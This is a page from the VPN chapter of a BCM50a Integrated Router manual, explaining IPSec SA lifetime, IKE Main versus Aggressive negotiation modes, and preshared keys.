Filter
Top Products
232 Chapter 13 VPN
N0115790
• Set the IPSec SA lifetime. In this field, you can determine how long the IPSec
SA will stay up before it times out. The BCM50a Integrated Router
automatically renegotiates the IPSec SA if there is traffic when the IPSec SA
lifetime period expires. The BCM50a Integrated Router also automatically
renegotiates the IPSec SA if both IPSec routers have keep alive enabled, even
if there is no traffic. If an IPSec SA times out, the IPSec router must
renegotiate the SA the next time someone attempts to send traffic.
Negotiation Mode
The phase 1 Negotiation Mode you select determines how the Security
Association (SA) is established for each connection through IKE negotiations.
Main Mode ensures the highest level of security when the communicating parties
are negotiating authentication (phase 1). It uses six messages in three round trips:
SA negotiation, Diffie-Hellman exchange, and an exchange of nonces (a nonce is
a random number). This mode features identity protection (your identity is not
revealed in the negotiation).
Aggressive Mode is quicker than Main Mode because it eliminates several steps
when the communicating parties are negotiating authentication (phase 1).
However the trade-off is that faster speed limits its negotiating power and it also
does not provide identity protection. It is useful in remote access situations where
the address of the initiator is not known by the responder and both parties want to
use preshared key authentication.
Preshared key
A preshared key identifies a communicating party during a phase 1 IKE
negotiation. It is called preshared because you have to share it with another party
before you can communicate with the party over a secure connection.